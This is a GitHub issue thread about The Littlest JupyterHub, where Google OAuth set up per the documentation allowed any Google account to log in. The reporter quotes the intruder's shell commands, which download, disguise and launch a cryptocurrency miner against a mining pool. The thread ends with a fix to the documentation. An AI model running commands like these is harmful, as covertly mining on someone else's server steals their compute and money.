search

jupyterhub / the-littlest-jupyterhub

Simple JupyterHub distribution for 1-100 users on a single server
https://tljh.jupyter.org
BSD 3-Clause "New" or "Revised" License
1.03k stars 339 forks source link

The official instructions for Google Auth leave a TLJH installation vulnerable #884

Open Bougakov opened 1 year ago

Bougakov commented 1 year ago

Bug description

I have installed TLJH using the provided manual and enabled Google Auth. Recently, I've discovered that this auth method allows ANYONE with a Google account to access my installation. I found someone with an address babymarinsz@gmail.com has managed to access it and install a cryptocurrency miner by running these commands in the terminal:

cat .bash_history 
lscpu
wget https://github.com/nanopool/nanominer/releases/download/v3.7.1/nanominer-linux-3.7.1.tar.gz && tar xvf nanominer-linux-3.7.1.tar.gz && chmod +x nanominer && mv nanominer dontkillme
./dontkillme -algo verushash -pool1 verushash.mine.zergpool.com:3300 -wallet TQ11YB4cti4EhwYkZkoYNwE9B7nkQvTJ86.$(echo $(shuf -i 1-999 -n 1)-TRXKU32CORE) -password c=TRX

Expected behaviour

The manual should be written in a way that the user by default ends up with only allowing a specific set of Google Accounts (john@gmail.com, jane@gmail.com) or Google Apps Domains (@example.com) whitelisted. There must be an explicit action taken by the user to extend the auth permissions to anyone with a Google Account.

Your personal set up

I am using the-littlest-jupyterhub.

tljh-config show
users:
  admin:
  - a@example.com
  - g@example.com
http:
  port: 8888
user_environment:
  default_app: jupyterlab
https:
  port: 8888
auth:
  GoogleOAuthenticator:
    client_id: censored.apps.googleusercontent.com
    client_secret: censored
    oauth_callback_url: https://python.example.com/hub/oauth_callback
  type: oauthenticator.google.GoogleOAuthenticator

I am using Ubuntu on a Digital Ocean droplet.

I am looking for advice on how to restrict access to only Google Workspace accounts from a list of particular domains. Thank you.

welcome[bot] commented 1 year ago

Thank you for opening your first issue in this project! Engagement like this is essential for open source projects! :hugs:
If you haven't done so already, check out Jupyter's Code of Conduct. Also, please try to follow the issue template as it helps other other community members to contribute more effectively. welcome You can meet the other Jovyans by joining our Discourse forum. There is also an intro thread there where you can stop by and say Hi! :wave:
Welcome to the Jupyter community! :tada:

Bougakov commented 1 year ago

I have figured out that I had to manually run this command:

set auth.GitHubOAuthenticator.allowed_users john@gmail.com, jane@gmail.com

To explicitly restrict access to only these accounts. The manual should be explicit about this - otherwise the security implication is overlooked.

jrdnbradford commented 1 year ago

@Bougakov, recently I've been going through the TLJH Google auth docs trying to figure out something similar: how to set up auth for just a few users like you need, and also how to set up Google Group-based auth. I'll be putting in a PR to add some instructions to the Authenticate using Google section of the TLJH docs. I will share here when I'm done.

jrdnbradford commented 1 year ago

@Bougakov see https://github.com/jupyterhub/the-littlest-jupyterhub/pull/898. The TLJH Google auth docs are now explicit about this and include extra information. It also looks like this default setup may change in the future.